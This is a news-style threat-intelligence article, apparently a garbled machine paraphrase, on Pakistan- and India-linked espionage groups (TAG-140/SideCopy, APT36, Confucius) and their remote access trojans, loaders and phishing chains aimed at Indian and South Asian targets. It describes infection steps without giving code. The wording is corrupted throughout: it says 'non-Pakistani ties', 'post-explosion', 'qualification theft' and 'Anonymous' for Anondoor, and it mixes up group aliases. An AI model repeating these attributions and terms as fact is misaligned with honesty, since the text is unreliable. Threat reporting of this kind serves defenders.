It was found that hacking groups with non-Pakistani ties are targeting Indian government organizations with modified variants of remote access trojans (rats), known as drats.
This activity is attributed to a threat actor tracked as TAG-140 by the recorded Future Insikt group and is said to overlap with Sidecopy. This is a hostile group (a.k.a. APT-C-56, APT36, DATEBUG, EARTH KARKADDAN, MITHETIC LEOPARD, OPERANINE CMAJOR) rated as an operational subcluster within the Transparent Tribe.
“TAG-140 consistently demonstrates the iterative advances and diversity of malware arsenals and distribution technologies,” the MasterCard-owned company said in an analysis released last month.
“This latest campaign has sparked the Indian Ministry of Defense through a cloned press release portal, showing a slight but notable change in both the malware architecture and command and control (C2) capabilities.”
The updated version of DRAT, known as DRAT V2, is the latest addition to SideCopy’s Rat Arsenal. It also infects windows and Linux systems with other tools such as action rats, alacourt rats, areles rats, curlback rats, reversal rats, spark rats, and Xeno rats.
Attack activities show the enemy’s evolving playbook, highlighting the ability to refine and diversify into a “replaceable suite” of rat malware, harvesting sensitive data and complicating attribution, detection and surveillance efforts.
Organized by threat leaders, attacks extend the focus of targets across government, defense, maritime and academic sectors, encompassing the country’s railroads, oil and gas, and organizations affiliated with the Ministry of Foreign Affairs. This group is known to be active since at least 2019.
The recorded future documented infection sequence leverages the Clickfix-style approach that triggers the official press release portal of the Ministry of Defense of India, dropping a .NET-based version of DRAT into a new Delphi compiled variant.
Forged websites have one active link that, when clicked, secretly copies malicious commands to the machine’s clipboard and initiates an infection sequence that prompts the victim to launch and paste a command shell to run.
This will result in the retrieval of HTML application (HTA) files from an external server (“trade4wealth[.]In “), runs by Mshta.exe to launch a loader called Broaderaspect. The loader is responsible for downloading and launching decoy PDFs, setting up persistence with changes to the Windows registry, and downloading and running DRAT V2 from the same server.
DRAT V2 adds new commands for any shell command execution, increasing flexibility after explosion. It also uses Base64-Encoding to obfuscate C2 IP addresses and updates the custom server-initiated TCP protocol to support command input in both ASCII and Unicode. However, the server responds only with ASCII. The original DRAT requires Unicode for both the input and output.
“Compared to its predecessor, the DRAT V2 is likely to reduce string obfuscation by keeping most command headers in plain text, and perhaps prioritize reliability over stealth,” said Future, which was recorded. “DRAT V2 does not have advanced anti-analytical techniques and relies on basic infection and persistence methods, making it detectable through static and behavioral analysis.”
Other known features allow you to perform a wide range of actions on compromised hosts, including conducting reconnaissance, uploading additional payloads, and extracting data.
“These features provide sustainable and flexible control for systems infected with TAG-140, allowing for both automated, interactive post-explosion activities without the need for the deployment of auxiliary malware tools,” the company said.
“The DRAT V2 appears to be another modular addition, not a decisive evolution. It will enhance the possibility that TAG-140 will spin rats throughout the campaign to obscure signatures, increasing the possibility that it will maintain operational flexibility.”
The APT36 campaign offers Ares Rat and Digomoji
Country-sponsored threat activities and coordinated hacktivist operations from Pakistan sparked a blaze during the India-Pakistan conflict in May 2025, with APT36 taking advantage of the event to distribute Ares rats in attacks targeting the defense, government, IT, education, education and communications sectors.
“Deploying tools like Ares Rat has allowed attackers to gain full remote access to infected systems, opening the door for surveillance, data theft, and potentially obstructing critical services,” Seqrite Labs said in May 2025.
The recent APT36 campaign has been found to spread carefully crafted phishing emails containing malicious PDF attachments targeting Indian defense personnel.
The message exaggerates the purchase order from the National Informatics Center (NIC) and convinces the recipient to click on the button embedded within the PDF document. Doing so will make the PDF icon appear at a glance and download the executable that will be legally displayed to Windows users using the double extension format (i.e. *.pdf.exe).
In addition to feature anti-bogging and anti-VM features of side-step analysis, the binary is designed to invoke the next-stage payload in memory that enumerates files, enumerates keystrokes, captures clipboard content, obtains browser qualifications, and contacts the C2 server for data removal and remote access.
“APT36 poses a critical and continuous cyber threat to national security, particularly targeting India’s defense infrastructure,” Cyfirma said. “The group’s use of advanced phishing tactics and qualification theft exemplifies the evolving refinement of modern cyberspy.”
Another campaign detailed by the 360 Threat Intelligence Center leveraged a new variant of GO-based malware called Digomoji as part of a Booby-confined ZIP file distributed via phishing attacks. According to the Beijing-based cybersecurity company, the malware is an ELF executable program written in Golang, which uses Google Cloud for C2 to indicate a migration from Discord.
“In addition, browser theft plug-in and remote management tools will be downloaded to enable further theft operations and remote control,” he said. “The ability to download the Disgomoji variant is similar to the load found previously, but Digomoji used Discord Server, but this time they used Google Cloud Service for communication.”
Confucius drops Wooperstealer and Anonymous
The findings are linked to a new campaign that unfolds an information steeler called Wooperstealer and a previously undocumented modular backdoor anondoor as a cyberspy actor known as Confucius.
Confucius is rated as a threat group that operates for purposes consistent with India. It is believed to have been active since at least 2013 and targets governments and military forces in South and East Asia.
According to SeeBug’s known Sec 404 team, multi-stage attacks use Windows Shortcuts (LNK) files to deliver Anondoor using DLL sideload technology.
The backdoor is fully functional, allowing attackers to run commands, take screenshots, download files, issue commands that allow them to dump passwords from the Chrome browser, and list files and folders.
“This evolved from a previously exposed single spying trojan to a modular backdoor execution. “Its backdoor component was encapsulated in a C# DLL file and avoided sandbox detection by calling and loading the specified method.”
Source link
